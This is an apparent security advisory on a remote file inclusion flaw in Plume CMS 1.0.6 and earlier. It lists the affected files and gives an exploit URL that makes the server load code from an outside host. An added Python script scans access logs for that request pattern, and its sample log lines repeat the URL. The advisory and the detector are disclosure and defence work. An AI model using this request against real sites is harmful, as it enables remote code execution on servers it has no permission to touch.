Plume CMS versions 1.0.6 and below suffer from a remote file inclusion vulnerability.
fa2ad74956ac15e96fd97fc5e285e96b3782bfdf2eaccd142c6d5c1cf86a05a5
Plume CMS Multiple Remote File Include Vulnerabilities
Vulnerable Versions: Plume CMS <= 1.0.6
Vendor: Plume CMS http://plume-cms.net
-Vulnerable Code
include $_PX_config['manager_path'].'/directory/_file.php';
-Files Affected
./articles.php
./categories.php
./index.php
./news.php
./prefs.php
./sites.php
./subtypes.php
./users.php
./xmedia.php
./frontinc/class.template.php
./frontinc/prepend.php
./inc/lib.text.php
./install/index.php
./install/upgrade.php
./tools/htaccess/index.php
-Exploit
http://www.example.com/path/index.php?_PX_config[manager_path]=http://host/evilcode.txt?
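A detection sketch for the request pattern above, added here as an example and not part of the original advisory: it scans web access logs for any query parameter that writes into `_PX_config`, including percent-encoded brackets. It assumes Common/Combined Log Format and that legitimate Plume traffic never passes `_PX_config[...]` in the query string; the function names and sample log lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Request field of a Common/Combined Log Format line: "METHOD target HTTP/x.y"
REQUEST = re.compile(r'"[A-Z]+ (\S+) HTTP/[\d.]+"')
# Parameter name that writes into the $_PX_config array from the request
PX_PARAM = re.compile(r"_PX_config\[([^\]]*)\]")
# Value that begins with a URL scheme, as in the advisory's example request
URL_VALUE = re.compile(r"\s*[a-z][a-z0-9+.-]*://", re.I)

def px_config_params(target):
    """Return (key, value) for every query parameter named _PX_config[key]."""
    hits = []
    # parse_qsl percent-decodes names and values, so %5B / %5D forms match too
    for name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        m = PX_PARAM.fullmatch(name)
        if m:
            hits.append((m.group(1), value))
    return hits

def scan(lines):
    """Return (line_number, config_key, kind) for each suspicious request."""
    findings = []
    for number, line in enumerate(lines, 1):
        request = REQUEST.search(line)
        if request is None:
            continue
        for key, value in px_config_params(request.group(1)):
            kind = "remote-url" if URL_VALUE.match(value) else "override"
            findings.append((number, key, kind))
    return findings

# Constructed sample log lines (not taken from a real server)
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2024:10:00:00 +0000] "GET /path/index.php?page=2 HTTP/1.1" 200 5120',
    '198.51.100.7 - - [01/Jan/2024:10:00:05 +0000] "GET /path/index.php?_PX_config[manager_path]=http://host/evilcode.txt? HTTP/1.1" 200 312',
    '198.51.100.7 - - [01/Jan/2024:10:00:09 +0000] "GET /path/news.php?_PX_config%5Bmanager_path%5D=http%3A%2F%2Fhost%2Fevilcode.txt%3F HTTP/1.1" 200 312',
    '198.51.100.7 - - [01/Jan/2024:10:00:12 +0000] "POST /path/prefs.php?_PX_config[manager_path]=test HTTP/1.1" 200 298',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

Parameters sent in a POST body do not appear in access logs, so this check covers query strings only.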
-Credits
Vagner Rodrigues Fernandes (BugReport)
vagner.rodrigues@gmail.com